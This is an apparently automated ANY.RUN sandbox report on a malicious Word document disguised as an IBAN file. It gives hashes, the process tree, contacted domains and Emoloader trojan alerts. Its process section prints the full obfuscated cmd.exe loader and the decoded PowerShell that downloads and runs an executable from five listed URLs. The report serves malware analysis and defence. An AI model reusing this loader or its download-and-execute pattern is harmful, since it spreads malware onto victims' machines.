analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

IBAN_DE60 4004 7689 6082 6110 08.doc

Full analysis: https://app.any.run/tasks/5f8b1c3a-ff3a-4a59-b994-6ddabfe4eb2c
Verdict: Malicious activity
Analysis date: December 18, 2018, 09:14:37
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
macros
macros-on-open
generated-doc
Indicators:
MIME: application/msword
File info: Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Tue Dec 18 07:55:00 2018, Last Saved Time/Date: Tue Dec 18 07:55:00 2018, Number of Pages: 1, Number of Words: 3, Number of Characters: 22, Security: 0
MD5:

F8E83909F528518A1E2835EF1D9E6C9F

SHA1:

2455AB653E555478E5FFDE3940EF145530218310

SHA256:

DB4EBE46E6FBE442FCE2D055BB25F6A0D8736E09152034DF6231E2F15FEAE50D

SSDEEP:

768:wf4OEKjmW9/MqtBMENPOgHvgekSD6axz99Zk5Q+RqB2XwOxb6i+1o9:m7ljmW9/bvFn3Db3zH+VX75+a9

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 2940)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 2940)
    • Executes PowerShell scripts

      • cmd.exe (PID: 3804)
  • SUSPICIOUS

    • Starts CMD.EXE for commands execution

      • cmd.exe (PID: 3256)
    • Creates files in the user directory

      • powershell.exe (PID: 3692)
  • INFO

    • Creates files in the user directory

      • WINWORD.EXE (PID: 2940)
    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 2940)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.doc | Microsoft Word document (54.2)
.doc | Microsoft Word document (old ver.) (32.2)

EXIF

FlashPix

Title: -
Subject: -
Author: -
Keywords: -
Comments: -
Template: Normal.dotm
LastModifiedBy: -
RevisionNumber: 1
Software: Microsoft Office Word
TotalEditTime: -
CreateDate: 2018:12:18 07:55:00
ModifyDate: 2018:12:18 07:55:00
Pages: 1
Words: 3
Characters: 22
Security: None
CodePage: Windows Latin 1 (Western European)
Company: -
Lines: 1
Paragraphs: 1
CharCountWithSpaces: 24
AppVersion: 16
ScaleCrop: No
LinksUpToDate: No
SharedDoc: No
HyperlinksChanged: No
TitleOfParts: -
HeadingPairs:
  • Title
  • 1
CompObjUserTypeLen: 32
CompObjUserType: Microsoft Word 97-2003 Document
No data.
screenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
4
Malicious processes
3
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe

Process information

PID
CMD
Path
Indicators
Parent process
2940"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Roaming\IBAN_DE60 4004 7689 6082 6110 08.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3256c:\zBXFOYMnfAslX\BwYnWCZVt\jZbqNFLsH\..\..\..\windows\system32\cmd.exe /c %ProgramData:~0,1%%ProgramData:~9,2% /V:ON/C"set Tlwk=;'voz'=jOv$}}{hctac}};kaerb;'tVp'=FPN$;TDc$ metI-ekovnI{ )00008 eg- htgnel.)TDc$ metI-teG(( fI;'Ucd'=Cst$;)TDc$ ,MSj$(eliFdaolnwoD.vbW${yrt{)LKw$ ni MSj$(hcaerof;'exe.'+uUn$+'\'+pmet:vne$=TDc$;'BjZ'=CNU$;'483' = uUn$;'Aho'=zCG$;)'@'(tilpS.'9LTmLS/moc.ehcuod-ecapse.www//:ptth@DnOX/gro.aciremagalf.www//:ptth@A/moc.npci//:ptth@6/moc.etiesebeil.www//:ptth@qfPVbU/moc.munihpled//:ptth'=LKw$;tneilCbeW.teN tcejbo-wen=vbW$;'JCE'=tQj$ llehsrewop&&for /L %S in (438,-1,0)do set Zy=!Zy!!Tlwk:~%S,1!&&if %S==0 call %Zy:~4%"c:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3804CmD /V:ON/C"set Tlwk=;'voz'=jOv$}}{hctac}};kaerb;'tVp'=FPN$;TDc$ metI-ekovnI{ )00008 eg- htgnel.)TDc$ metI-teG(( fI;'Ucd'=Cst$;)TDc$ ,MSj$(eliFdaolnwoD.vbW${yrt{)LKw$ ni MSj$(hcaerof;'exe.'+uUn$+'\'+pmet:vne$=TDc$;'BjZ'=CNU$;'483' = uUn$;'Aho'=zCG$;)'@'(tilpS.'9LTmLS/moc.ehcuod-ecapse.www//:ptth@DnOX/gro.aciremagalf.www//:ptth@A/moc.npci//:ptth@6/moc.etiesebeil.www//:ptth@qfPVbU/moc.munihpled//:ptth'=LKw$;tneilCbeW.teN tcejbo-wen=vbW$;'JCE'=tQj$ llehsrewop&&for /L %S in (438,-1,0)do set Zy=!Zy!!Tlwk:~%S,1!&&if %S==0 call %Zy:~4%"C:\Windows\system32\cmd.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
3692powershell $jQt='ECJ';$Wbv=new-object Net.WebClient;$wKL='http://delphinum.com/UbVPfq@http://www.liebeseite.com/6@http://icpn.com/A@http://www.flagamerica.org/XOnD@http://www.espace-douche.com/SLmTL9'.Split('@');$GCz='ohA';$nUu = '384';$UNC='ZjB';$cDT=$env:temp+'\'+$nUu+'.exe';foreach($jSM in $wKL){try{$Wbv.DownloadFile($jSM, $cDT);$tsC='dcU';If ((Get-Item $cDT).length -ge 80000) {Invoke-Item $cDT;$NPF='pVt';break;}}catch{}}$vOj='zov';C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 581
Read events
1 112
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
2
Text files
2
Unknown types
6

Dropped files

PID
Process
Filename
Type
2940WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVRA9FF.tmp.cvr
MD5:
SHA256:
2940WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F19EB992.wmf
MD5:
SHA256:
2940WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\42825F70.wmf
MD5:
SHA256:
3692powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3DD04T32K5LQ0T9W3E75.temp
MD5:
SHA256:
2940WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Office\Recent\index.dattext
MD5:5E28B49F563DB769E4A321A6BC1129D3
SHA256:896467E85C8F7999FAF432AC2BDF36B78DB6D0982146CBAC298ED79E2BC3BF63
2940WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\A241986B.wmfwmf
MD5:1912B65D64BEAF7F1307D7981D0050A6
SHA256:BDAC18229C360B4CEA300E8927D8B8BAEEE77244A5B50C2A43EF36004313ECEB
2940WINWORD.EXEC:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exdtlb
MD5:B275FED97256AEEFD960455C77265EC8
SHA256:EB6E979B87CB51182866C47AA16EC1FC842083371253F05A9265FF402ED9E7A6
2940WINWORD.EXEC:\Users\admin\AppData\Roaming\~$AN_DE60 4004 7689 6082 6110 08.docpgc
MD5:00E04271A373D487D25698E8C886A894
SHA256:9C79E3C57570D469B4DF5EC316504A0DECF2468BECA00BA0BFA437068C604EFE
3692powershell.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-msbinary
MD5:0C1DAA668BA499584B0AC7476368101E
SHA256:326CCA676EAA6C8A45F71B6239CC22D9F49085AB54229E1777D0E15C50EC13DA
2940WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:4F5F40C47DDD92765B47161B15380CF9
SHA256:3A34E29F643B0F7C1B38279E3FA88B8310EFE43FDAF57CAE22CE4944767D3F29
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
5
TCP/UDP connections
5
DNS requests
5
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
3692
powershell.exe
GET
404
81.88.48.95:80
http://delphinum.com/UbVPfq
IT
xml
345 b
malicious
3692
powershell.exe
GET
404
192.185.77.75:80
http://icpn.com/A
US
xml
345 b
malicious
3692
powershell.exe
GET
404
81.19.145.40:80
http://www.liebeseite.com/6
AT
xml
345 b
malicious
3692
powershell.exe
GET
404
83.166.138.20:80
http://www.espace-douche.com/SLmTL9
CH
xml
345 b
malicious
3692
powershell.exe
GET
404
154.16.118.229:80
http://www.flagamerica.org/XOnD
IL
xml
345 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3692
powershell.exe
81.19.145.40:80
www.liebeseite.com
World4You Internet Services GmbH
AT
suspicious
3692
powershell.exe
81.88.48.95:80
delphinum.com
Register.it SpA
IT
suspicious
3692
powershell.exe
192.185.77.75:80
icpn.com
CyrusOne LLC
US
malicious
3692
powershell.exe
154.16.118.229:80
www.flagamerica.org
IL
suspicious
3692
powershell.exe
83.166.138.20:80
www.espace-douche.com
Infomaniak Network SA
CH
malicious

DNS requests

Domain
IP
Reputation
delphinum.com
  • 81.88.48.95
malicious
www.liebeseite.com
  • 81.19.145.40
malicious
icpn.com
  • 192.185.77.75
malicious
www.flagamerica.org
  • 154.16.118.229
malicious
www.espace-douche.com
  • 83.166.138.20
malicious

Threats

PID
Process
Class
Message
3692
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3692
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
3692
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3692
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
3692
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3692
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Trojan-Downloader Emoloader Win32
3692
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
3692
powershell.exe
A Network Trojan was detected
SC TROJAN_DOWNLOADER Suspicious loader with tiny header
No debug info